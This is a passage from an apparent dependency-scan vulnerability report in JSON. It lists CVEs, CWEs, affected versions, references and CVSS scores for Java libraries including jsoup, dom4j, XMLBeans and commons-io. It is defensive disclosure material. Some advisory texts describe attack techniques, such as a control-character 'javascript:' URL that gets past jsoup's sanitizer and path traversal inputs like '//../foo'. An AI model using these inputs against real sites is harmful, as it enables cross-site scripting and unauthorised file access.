List","url":"https://lists.apache.org/thread.html/r01043f584cbd47959fabe18fff64de940f81a65024bb8dddbda31d9a@%3Cuser.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bc98e9cd080b4a13b905c571b9bed87e1a0878d44dbf21487c6cca4@%3Cdev.santuario.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17cb932fab14801b14e5b97a7f05192f4f366ef260c10d4a8dba8ac9@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r293284c6806c73f51098001ea86a14271c39f72cd76af9e946d9d9ad@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r39de20c7e9c808b1f96790875d33e58c9c0aabb44fd9227e7b3dc5da@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3ea4c4c908505b20a4c268330dfe7188b90c84dcf777728d02068ae6@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4cd59453b65d4ac290fcb3b71fdf32b4f1f8989025e89558deb5a245@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r52a5129df402352adc34d052bab9234c8ef63596306506a89fdc7328@%3Cusers.activemq.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7f209b837217d2a0fe5977fb692e7f15d37fa5de8214bcdc4c21d9a7@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9dc2505651788ac668299774d9e7af4dc616be2f56fdc684d1170882@%3Cusers.activemq.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb042f3b0090e419cc9f5a3d32cf0baff283ccd6fcb1caea61915d6b6@%3Ccommits.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbee7270556f4172322936b5ecc9fabf0c09f00d4fa56c9de1963c340@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2a89e17e8a9b451ce655f1a34117752ea1d18a22ce580d8baa824fd@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e865c87f9043c21d9c1fd9d4df866061d9a08cfc322771160d8058@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re641197d204765130618086238c73dd2ce5a3f94b33785b587d72726@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re8e7482fe54d289fc0229e61cc64947b63b12c3c312e9f25bf6f3b8c@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reab5978b54a9f4c078402161e30a89c42807b198814acadbe6c862c7@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf7d369de88dc88a1347006a3323b3746d849234db40a8edfd5ebc436@%3Cdev.ws.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00019.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13936"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13936"},{"summary":"Gentoo Advisory glsa-202107-52","url":"https://security.gentoo.org/glsa/202107-52"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.velocity/velocity@vers:maven/>=1.5|<=1.7"]}],"title":"CVE-2020-13936/pkg:maven/org.apache.velocity/velocity@1.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23926"]}],"cve":"CVE-2021-23926","cwe":{"id":"776","name":"Improper Restriction of Recursive Entity References in DTDs"},"discovery_date":"2021-06-16T17:37:11","ids":[{"system_name":"CVE Record","text":"CVE-2021-23926"},{"system_name":"Apache Advisory","text":"XMLBEANS-517"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210513-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of Recursive Entity References in Apache XMLBeans"},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of Recursive Entity References in Apache XMLBeans The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0."}],"product_status":{"known_affected":["org.apache.xmlbeans/xmlbeans@vers:maven/>=2.2.0|<=2.6.0"]},"references":[{"summary":"Apache Advisory XMLBEANS-517","url":"https://issues.apache.org/jira/browse/XMLBEANS-517"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2dc5588009dc9f0310b7382269f932cc96cae4c3901b747dda1a7fed@%3Cjava-dev.axis.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbb01d10512098894cd5f22325588197532c64f1c818ea7e4120d40c1@%3Cjava-dev.axis.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/06/msg00024.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23926"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23926"},{"summary":"NetApp Advisory ntap-20210513-0004","url":"https://security.netapp.com/advisory/ntap-20210513-0004"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.1,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.1,"environmentalSeverity":"CRITICAL","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.1,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["org.apache.xmlbeans/xmlbeans@vers:maven/>=2.2.0|<=2.6.0"]}],"title":"CVE-2021-23926/pkg:maven/org.apache.xmlbeans/xmlbeans@2.3.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10683"]}],"cve":"CVE-2020-10683","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2020-06-05T16:13:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-10683"},{"system_name":"Owasp Advisory","text":"XML_External_Entity_Prevention_Cheat_Sheet"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200518-0002"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1694235"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"dom4j allows External Entities by default which might enable XXE attacks"},{"category":"details","details":"Vulnerability Details","text":"# dom4j allows External Entities by default which might enable XXE attacks dom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.  Note: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended."}],"product_status":{"known_affected":["dom4j/dom4j@vers:maven/>=1.1|<=1.6.1"],"known_not_affected":["dom4j/dom4j@2.1.3"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1694235"},{"summary":"Owasp Advisory XML_External_Entity_Prevention_Cheat_Sheet","url":"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"NetApp Advisory ntap-20200518-0002","url":"https://security.netapp.com/advisory/ntap-20200518-0002"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["dom4j/dom4j@vers:maven/>=1.1|<=1.6.1"]}],"title":"CVE-2020-10683/pkg:maven/dom4j/dom4j@1.6.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-23640"]}],"cve":"CVE-2022-23640","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2022-03-02T21:30:54","ids":[{"system_name":"CVE Record","text":"CVE-2022-23640"},{"system_name":"GitHub Advisory","text":"GHSA-xvm2-9xvc-hx7f"}],"notes":[{"audience":"developers","category":"other","text":"Improper Restriction of Recursive Entity References in DTDs","title":"Additional CWE: 776"},{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of XML External Entity Reference in com.monitorjbl:xlsx-streamer"},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of XML External Entity Reference in com.monitorjbl:xlsx-streamer ### Impact Prior to xlsx-streamer 2.1.0, the XML parser that was used did not apply all the necessary settings to prevent XML Entity Expansion issues.  ### Patches Upgrade to version 2.1.0.  ### Workarounds No known workaround.  ### References https://github.com/monitorjbl/excel-streaming-reader/commit/0749c7b9709db078ccdeada16d46a34bc2910c73  ### For more information If you have any questions or comments about this advisory: * Open an issue in [monitorjbl/excel-streaming-reader](https://github.com/monitorjbl/excel-streaming-reader)"}],"product_status":{"known_affected":["com.monitorjbl/xlsx-streamer@vers:maven/>=0.2.3|<=2.0.0"]},"references":[{"summary":"GitHub Advisory GHSA-xvm2-9xvc-hx7f","url":"https://github.com/monitorjbl/excel-streaming-reader/security/advisories/GHSA-xvm2-9xvc-hx7f"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23640"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23640"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.monitorjbl/xlsx-streamer@vers:maven/>=0.2.3|<=2.0.0"]}],"title":"CVE-2022-23640/pkg:maven/com.monitorjbl/xlsx-streamer@2.0.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-36033"]}],"cve":"CVE-2022-36033","cwe":{"id":"79","name":"Improper Neutralization of Input During Web Page Generation"},"discovery_date":"2022-09-01T22:14:57","ids":[{"system_name":"CVE Record","text":"CVE-2022-36033"},{"system_name":"GitHub Advisory","text":"GHSA-gp7f-rwcx-9369"},{"system_name":"NetApp Advisory","text":"ntap-20221104-0006"},{"system_name":"Jsoup Advisory","text":"release-1"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jsoup may not sanitize code injection XSS attempts if SafeList.preserveRelativeLinks is enabled"},{"category":"details","details":"Vulnerability Details","text":"# jsoup may not sanitize code injection XSS attempts if SafeList.preserveRelativeLinks is enabled jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow cross-site scripting (XSS) attacks when a reader subsequently clicks that link. If the non-default `SafeList.preserveRelativeLinks` option is enabled, HTML including `javascript:` URLs that have been crafted with control characters will not be sanitized. If the site that this HTML is published on does not set a Content Security Policy, an XSS attack is then possible.  ### Impact Sites that accept input HTML from users and use jsoup to sanitize that HTML, may be vulnerable to cross-site scripting (XSS) attacks, if they have enabled `SafeList.preserveRelativeLinks` and do not set an appropriate Content Security Policy.  ### Patches This issue is patched in jsoup 1.15.3.  Users should upgrade to this version. Additionally, as the unsanitized input may have been persisted, old content should be cleaned again using the updated version.  ### Workarounds To remediate this issue without immediately upgrading:  - disable `SafeList.preserveRelativeLinks`, which will rewrite input URLs as absolute URLs - ensure an appropriate [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) is defined. (This should be used regardless of upgrading, as a defence-in-depth best practice.)  ### Background and root cause jsoup includes a [Cleaner](https://jsoup.org/apidocs/org/jsoup/safety/Cleaner.html) component, which is designed to [sanitize input HTML](https://jsoup.org/cookbook/cleaning-html/safelist-sanitizer) against configurable safe-lists of acceptable tags, attributes, and attribute values.  This includes removing potentially malicious attributes such as `<a href=\"javascript:...\">`, which may enable XSS attacks. It does this by validating URL attributes against allowed URL protocols (e.g. `http`, `https`).  However, an attacker may be able to bypass this check by embedding control characters into the href attribute value. This causes the Java URL class, which is used to resolve relative URLs to absolute URLs before checking the URL's protocol, to treat the URL as a relative URL. It is then resolved into an absolute URL with the configured base URI.  For example, `java script:...` would resolve to `https://example.com/java script:...`.  By default, when using a safe-list that allows `a` tags, jsoup will rewrite any relative URLs (e.g. `/foo/`) to an absolute URL (e.g. `https://example.com/foo/`). Therefore, this attack attempt would be successfully mitigated. However, if the option [SafeList.preserveRelativeLinks](https://jsoup.org/apidocs/org/jsoup/safety/Safelist.html#preserveRelativeLinks(boolean)) is enabled (which does not rewrite relative links to absolute), the input is left as-is.  While Java will treat a path like `java script:` as a relative path, as it does not match the allowed characters of a URL spec, browsers may normalize out the control characters, and subsequently evaluate it as a `javascript:` spec inline expression. That disparity then leads to an XSS opportunity.  Sites defining a Content Security Policy that does not allow javascript expressions in link URLs will not be impacted, as the policy will prevent the script's execution.  ### For more information If you have any questions or comments about this advisory: * Open an issue in [jsoup](https://github.com/jhy/jsoup) * Email the author of jsoup at [jonathan@hedley.net](mailto:jonathan@hedley.net)  ### Credits Thanks to Jens Häderer, who reported this issue, and contributed to its resolution."}],"product_status":{"known_affected":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.15.3"],"known_not_affected":["org.jsoup/jsoup@1.15.3"]},"references":[{"summary":"GitHub Advisory GHSA-gp7f-rwcx-9369","url":"https://github.com/jhy/jsoup/security/advisories/GHSA-gp7f-rwcx-9369"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.15.3"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36033"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36033"},{"summary":"NetApp Advisory ntap-20221104-0006","url":"https://security.netapp.com/advisory/ntap-20221104-0006"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.1,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":6.1,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":6.1,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","version":"3.1"},"products":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.15.3"]}],"title":"CVE-2022-36033/pkg:maven/org.jsoup/jsoup@1.10.2?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37714"]}],"cve":"CVE-2021-37714","cwe":{"id":"248","name":"Uncaught Exception"},"discovery_date":"2021-08-23T19:42:38","ids":[{"system_name":"CVE Record","text":"CVE-2021-37714"},{"system_name":"GitHub Advisory","text":"GHSA-m72m-mhq2-9p6c"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0022"},{"system_name":"Jsoup Advisory","text":"release-1"}],"notes":[{"audience":"developers","category":"other","text":"Loop with Unreachable Exit Condition","title":"Additional CWE: 835"},{"category":"description","details":"Vulnerability Description","text":"Uncaught Exception in jsoup"},{"category":"details","details":"Vulnerability Details","text":"# Uncaught Exception in jsoup ### Impact _What kind of vulnerability is it? Who is impacted?_ Those using jsoup to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack.  ### Patches _Has the problem been patched? What versions should users upgrade to?_ Users should upgrade to jsoup 1.14.2  ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Users may rate limit input parsing. Users should limit the size of inputs based on system resources. Users should implement thread watchdogs to cap and timeout parse runtimes."}],"product_status":{"known_affected":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.14.2"],"known_not_affected":["org.jsoup/jsoup@1.14.2"]},"references":[{"summary":"GitHub Advisory GHSA-m72m-mhq2-9p6c","url":"https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.14.1"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.14.2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215009dbf7467a9f6506d0c0024cb36cad30071010e62c9352cfaaf0@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r377b93d79817ce649e9e68b3456e6f499747ef1643fa987b342e082e@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d71f18adb78e50f626dde689161ca63d3b7491bd9718fcddfaecba7@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r50e9c9466c592ca9d707a5dea549524d19e3287da08d8392f643960e@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r685c5235235ad0c26e86d0ee987fb802c9675de6081dbf0516464e0b@%3Cnotifications.james.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r97404676a5cf591988faedb887d64e278f522adcaa823d89ca69defe@%3Cnotifications.james.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc3354080fc67fb50b45b3c2d12dc4ca2a3c1c78dad3d3ba012c038aa@%3Cnotifications.james.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37714"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37714"},{"summary":"NetApp Advisory ntap-20220210-0022","url":"https://security.netapp.com/advisory/ntap-20220210-0022"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.14.2"]}],"title":"CVE-2021-37714/pkg:maven/org.jsoup/jsoup@1.10.2?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-29425"]}],"cve":"CVE-2021-29425","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-04-26T16:04:00","ids":[{"system_name":"Arxiv Advisory","text":"2306"},{"system_name":"CVE Record","text":"CVE-2021-29425"},{"system_name":"Apache Advisory","text":"IO-556"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0004"}],"notes":[{"audience":"developers","category":"other","text":"Improper Limitation of a Pathname to a Restricted Directory","title":"Additional CWE: 22"},{"category":"description","details":"Vulnerability Description","text":"Path Traversal and Improper Input Validation in Apache Commons IO"},{"category":"details","details":"Vulnerability Details","text":"# Path Traversal and Improper Input Validation in Apache Commons IO In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value."}],"product_status":{"known_affected":["commons-io/commons-io@vers:maven/>=0.1|<=2.6"],"known_not_affected":["commons-io/commons-io@2.7"]},"references":[{"summary":"Arxiv Advisory 2306","url":"https://arxiv.org/pdf/2306.05534.pdf"},{"summary":"Apache Advisory IO-556","url":"https://issues.apache.org/jira/browse/IO-556"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01b4a1fcdf3311c936ce33d75a9398b6c255f00c1a2f312ac21effe1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bfa8f7921abdfae788b1f076a12f73a92c93cc0a6e1083bce0027c5@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0d73e2071d1f1afe1a15da14c5b6feb2cf17e3871168d5a3c8451436@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1c2f4683c35696cf6f863e3c107e37ec41305b1930dd40c17260de71@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r20416f39ca7f7344e7d76fe4d7063bb1d91ad106926626e7e83fb346@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2345b49dbffa8a5c3c589c082fe39228a2c1d14f11b96c523da701db@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r27b1eedda37468256c4bb768fde1e8b79b37ec975cbbfd0d65a7ac34@%3Cdev.myfaces.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2bc986a070457daca457a54fe71ee09d2584c24dc262336ca32b6a19@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2df50af2641d38f432ef025cd2ba5858215cc0cf3fc10396a674ad2e@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r345330b7858304938b7b8029d02537a116d75265a598c98fa333504a@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4050f9f6b42ebfa47a98cbdee4aabed4bb5fb8093db7dbb88faceba2@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r462db908acc1e37c455e11b1a25992b81efd18e641e7e0ceb1b6e046@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r477c285126ada5c3b47946bb702cb222ac4e7fd3100c8549bdd6d3b2@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47ab6f68cbba8e730f42c4ea752f3a44eb95fb09064070f2476bb401@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5149f78be265be69d34eacb4e4b0fc7c9c697bcdfa91a1c1658d717b@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r523a6ffad58f71c4f3761e3cee72df878e48cdc89ebdce933be1475c@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r808be7d93b17a7055c1981a8453ae5f0d0fce5855407793c5d0ffffa@%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing 